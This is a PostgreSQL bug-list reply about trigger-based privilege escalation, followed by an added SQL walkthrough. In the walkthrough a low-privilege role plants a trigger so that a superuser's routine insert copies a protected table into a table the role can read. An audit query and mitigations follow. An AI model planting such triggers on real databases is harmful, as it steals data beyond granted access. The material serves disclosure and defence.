| From: | ZhangChi <798604270(at)qq(dot)com> |
|---|---|
| To: | Laurenz Albe <laurenz(dot)albe(at)cybertec(dot)at>, pgsql-bugs <pgsql-bugs(at)lists(dot)postgresql(dot)org> |
| Subject: | Re: BUG #18936: Trigger enable users to modify the tables which he doesn't have privilege |
| Date: | 2025-05-24 03:06:24 |
| Message-ID: | tencent_6FB22713DA38A8D08B25F3DDD06B9C792B07@qq.com |
| Lists: | pgsql-bugs |
Thanks for your reply!
However, it is common in some database servers for an attacker to gain minimal privileges on a single table within a target database. For instance, when registering an account on a service, the system might grant the user access to a dedicated table. Using the TRIGGER mechanism as I showed, such an attacker could then delete or exfiltrate data from other tables beyond their authorized access. Notably, this attack doesn't require superuser privileges - only access to the two relevant tables.
Permitting users to create triggers that can affect tables beyond their privilege scope appears to be a problematic design choice. Such triggers may be inadvertently executed by privileged users without their knowledge, creating potential security vulnerabilities.
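The scenario the message describes, reconstructed as an added example (this is not the reporter's original demonstration; the role, table and function names are assumptions). It relies on one documented PostgreSQL behaviour: a trigger function declared without SECURITY DEFINER runs with the privileges of whoever executes the statement that fires the trigger, not those of the user who created it. The script is meant to be run by a superuser in a scratch database; the audit query at the end is the check an operator can run before touching a table that other roles hold TRIGGER privilege on.

```sql
-- Added example, not part of the bug report. Run as a superuser in a
-- scratch database. Names (tenant, secrets, tenant_data, tenant_sink,
-- tenant_hook) are assumptions chosen for illustration.

-- A low-privilege role that will own one table's worth of access.
CREATE ROLE tenant;

-- Data the tenant must never read, owned by the superuser.
CREATE TABLE secrets (id serial PRIMARY KEY, payload text);
INSERT INTO secrets (payload) VALUES ('top secret');

-- The tenant's own tables: one the operator will write to, one the
-- tenant can read back from.
CREATE TABLE tenant_data (id serial PRIMARY KEY, note text);
CREATE TABLE tenant_sink (id serial PRIMARY KEY, leaked text);
GRANT SELECT, INSERT, TRIGGER ON tenant_data TO tenant;
GRANT SELECT, INSERT ON tenant_sink TO tenant;
-- PostgreSQL 15+ no longer grants CREATE on public to everyone; the
-- tenant needs it (or some other schema) to create the function.
GRANT USAGE, CREATE ON SCHEMA public TO tenant;

-- As the tenant: a trigger function that copies rows out of secrets.
-- SECURITY INVOKER is the default, so the body runs as whoever fires
-- the trigger, not as tenant.
SET ROLE tenant;
CREATE FUNCTION tenant_hook() RETURNS trigger LANGUAGE plpgsql AS $$
BEGIN
  INSERT INTO tenant_sink (leaked) SELECT payload FROM secrets;
  RETURN NULL;  -- AFTER trigger; return value is ignored
END $$;
CREATE TRIGGER tenant_hook_trg AFTER INSERT ON tenant_data
  FOR EACH STATEMENT EXECUTE FUNCTION tenant_hook();
-- Direct access is still denied to the tenant:
--   SELECT * FROM secrets;   -- ERROR: permission denied for table secrets
RESET ROLE;

-- The superuser does routine maintenance on the tenant's table. The
-- trigger fires with superuser privileges and the copy succeeds.
INSERT INTO tenant_data (note) VALUES ('housekeeping');

-- The tenant can now read what it could not select itself.
SET ROLE tenant;
SELECT leaked FROM tenant_sink;   -- one row: 'top secret'
RESET ROLE;

-- Operator's check: list non-internal triggers whose function is owned
-- by someone other than the table owner, and whether it is SECURITY
-- DEFINER. Any hit here runs other people's code under your privileges
-- the moment you modify that table.
SELECT n.nspname                  AS schema_name,
       c.relname                  AS table_name,
       t.tgname                   AS trigger_name,
       p.proname                  AS function_name,
       pg_get_userbyid(c.relowner) AS table_owner,
       pg_get_userbyid(p.proowner) AS function_owner,
       p.prosecdef                AS security_definer
FROM pg_trigger t
JOIN pg_class     c ON c.oid = t.tgrelid
JOIN pg_namespace n ON n.oid = c.relnamespace
JOIN pg_proc      p ON p.oid = t.tgfoid
WHERE NOT t.tgisinternal
  AND p.proowner <> c.relowner;
```

The grant that matters is TRIGGER on tenant_data together with the ability to create a function anywhere the tenant can reach; neither step needs superuser. The mitigations on the administrator's side are the ones this behaviour implies: do not hand out TRIGGER to roles you do not trust, run maintenance against user-owned tables under a role with no more privilege than the table needs (SET ROLE before the statement), and run the audit query above, or pg_dump's trigger listing, before bulk operations as a privileged account.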